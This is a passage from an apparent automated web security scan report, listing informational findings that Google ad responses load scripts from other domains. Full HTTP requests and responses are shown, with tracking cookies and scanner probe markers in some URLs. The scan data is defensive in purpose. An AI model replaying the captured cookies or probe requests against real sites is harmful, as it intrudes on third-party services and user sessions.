</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=ZgRAXFQYPQ72pSfK_PTQXwYv4sqzRgrPFWEPN0T11xiEIpxs2hJ8CaiUjHpmY1v-N23Q0O1bkk3X5KD3AvT7rK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFLdD31mqGRsMBpPXQG-h3S5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbROhQAEnBkK5TqFIPdMcXGIyEr_KizofF-fzw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.163. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676620&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658620545&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658620550&frm=1&adk=2614322350&ga_vid=1094438829.1303658621&ga_sid=1303658621&ga_hid=825275319&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=36813005&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:37 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=jpgdhg9u3sNhsHaJRlQfD7s3M4ppch86fwqbNsEQoK0hE9MNJhGa6rfuLTDXwqgLUAQw1ppc7q_cXI65lvmh1q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLUQtPUcUlC_s56T2e_ZUTBr39Jzt9X3KZSy9qlP-Cz3tgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3j6d2S4vVdi3hczlBeeHjQhxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAeQAItqsK5WhEMkk4Fa_OmlA2N1Iqvj8Efw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.164. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681232&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663232891&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303663232897&frm=1&adk=2614322350&ga_vid=2063264456.1303663233&ga_sid=1303663233&ga_hid=753296769&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:40:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1832

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-DQnLzKB5z_4NCcvMoHnPwAAAEAzMwdA-DQnLzKB5z_4NCcvMoHnPxnsrvSuVyNySsYda6b2ziV-UrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAFAcBAgUCAAQAAAAAXiC0fwAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303663230%29%3Buf%28%27c%27%2C+52368%2C+1303663230%29%3Buf%28%27r%27%2C+173254%2C+1303663230%29%3Bppv%288991%2C+%278224513753449688089%27%2C+1303663230%2C+1303706430%2C+52368%2C+25553%29%3B&cnd=!ERDMugiQmQMQxskKGAAg0ccBKEsxdSC_azKB5z9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbRSfQAPG68K7FoLqWJv-_Pl8m4fHVL_jPNfPA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtxJ_fVK0Ta-3PIu0sQf734nLCtfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtwIHYeoa95Y661w-QRjmHXxPOHSEQ%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.165. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679616&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661616983&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661616985&frm=1&adk=2614322350&ga_vid=713049586.1303661617&ga_sid=1303661617&ga_hid=1858360584&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=5 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:13:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2164

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25919918&ahcid=1089787&bimpd=NjumYd183li1RagKXPHl4zJBSmlLL3Dent3W9hZVSSWjt-lmIjisKXYtk0cxfCoqviBZB05Oxg-86kigsBDEeK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKTX2uj72I9GXI7eeNIzBneeyoFfUm2TbrHwZU0O9LZulgHBzIj8H9loLjUdnhyPRX-OTJHGejGxp7iHLGyOkzKzF3Y56invj3of6PKLgy5fgU2xBm3QHaMdsIoCKhXuXyRKhKXGgpt9ON4nDHaJZDdO5Ic1Tm7zMwsmC67vFMlBtC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_yn9VVK6_rwMQBzZUn9v7xi0hqZ7aZVDHmPPHvw4qFZy1waJQmyFM1l4x-S8oOkTR0WhneTrBKJPgkiiXrA82MwmMmAKf-fTCPDGWd8sW3YPeoMfJYxnPXg5QM4qQHcJp-g7NjMOSxqJylcziAJzN-mGX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfrUDDSQf7Ift07aelswxJAioByWRKoQ3oF0AT_2N-Em_gjdkSW0JhvnWXPD46RI-8Pt_T370WDWWY1SqEwEJwbhnBOUR0uKXwLnlzhRcF-z1FwKJb6pfzy6U4b-zmaBhHBA9y0FUzpqtDC0K6uSmpOaAE0HQb-VqGycWmukn0nOb6o408BxR9uazB8jKSDnLvk&acp=TbRMLgAAljwK5X5HHeFjM__szMt_CFh7hqb-ZA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBWUh9Lky0TbysAsf8lQezxoXvAcCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbl8ongssKXiaIB%26num%3D1%26sig%3DAGiWqtxWSydZHAnroC8LWurusL7QCOEiyw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.166. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676553&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658553416&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658553422&frm=1&adk=513358139&ga_vid=780386006.1303658553&ga_sid=1303658553&ga_hid=1236518823&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&eid=44901218&fu=4&ifi=1&dtd=9 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:22:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2138

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689665&l=728x90&aid=25919898&ahcid=1089768&bimpd=4iscdcrQg2DEYB_fAgs1OTdufYS_9rVh88_KQClOIF8RZUVTgvOBmsYjEQ5AVGChbOaWINprEDeBxIrSTxP3xa9niBJoz6621irB3f190hVoi5oxQPyCItoVSlkU2GiEKa7xi-Yh-L5zIgjO7n9XM9W-SvPVZ9uvWN6QKCcGWsFt1AnXVvRUHCS3x0AwhdfJ3aw-YCEaz7QM4D5LAnxbQ7rSVSD8gxGQo9yWqnwnO2rMXyWWCw2Wg6_6Y5q9_p_bBbemAK5ac4pIU_r3DPlTr6SpNtS5xAFUzv3qcEVeuuxxX0onbqlp94UcyJZT3SBOKttow5g-rySYtOkVF8bTFqY_8_8Z7NXseqr49ZBcif04vrDQ0fB507iMqqrwe9-wCcJzEb1qj5xmeir2G5gfeRFOZkHQDULxzGhZ5miPO-MBK6o41OnjVGPDnFcPiw702t_rQ7srsXknm5tu1vimODn1FAv89x4axE5Jcvz3NtFMDIEtJeySEAHPBemokDuS-jC1UtHHNFwS9St3vhOQNuG-cgitwdOGy-1t1LkciqXUoPaaHnaoorULvxTzi44m1_Si-euS0zvZ4Sy6x3y4oCJ3_lrfOLHGp3Z7z6cdQ5yP-_WAToXeZqf2MtabD7lkVaOGOyExKJZTm-Y9XkyAdN-ahVAQAFXdGsFm3CQtVRNcURMhRM2LhpW-3_PATP0ldS_tt6tjHLWep1NYjOYOW8Y5mWoOHoF4xNoAiTtMvK6wrRTD9o2SJxjqGPytYYwfCN76B5My79hs6m5sVTatSA&acp=TbRANgAGvRUK5X5JH2pw8u5ABJsFnmbaw37_FA&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBTeI_NkC0TZX6Gsn8lQfy4an7AcCshNAB-KLb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYi5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmAJkwAIEyALsk-kJqAMB6AO8AegDlAL1AwAAAMSABsPLiLav0OCOJQ%26num%3D1%26sig%3DAGiWqtxFN-SWoeyrcbJOM_G6FSduNZ7Mqw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.167. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676441&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658441795&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658441813&frm=1&adk=2614322350&ga_vid=596037721.1303658442&ga_sid=1303658442&ga_hid=931360055&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=57 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1923

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQ_xgANEQ4K5XtFLVwrw-XXrJe3yj-RN_KTDQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

24.168. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383920&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658383931&frm=1&adk=2614322350&ga_vid=22955387.1303658384&ga_sid=1303658384&ga_hid=456012454&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1838

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-yE2WDiJ9T_7ITZYOIn1PwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1PyPD10Szk0Y9SsYda6b2ziWNP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAQRABAgUCAAQAAAAAKSHOzQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658382%29%3Buf%28%27c%27%2C+52368%2C+1303658382%29%3Buf%28%27r%27%2C+173254%2C+1303658382%29%3Bppv%288991%2C+%274415378882846769955%27%2C+1303658382%2C+1303701582%2C+52368%2C+25553%29%3B&cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQ_jAAOTYYK5XFOGm5KNgYLJkB68AHlVgqkmA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBw2WRjD-0TYabOc7ilQe2lLnTAdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5u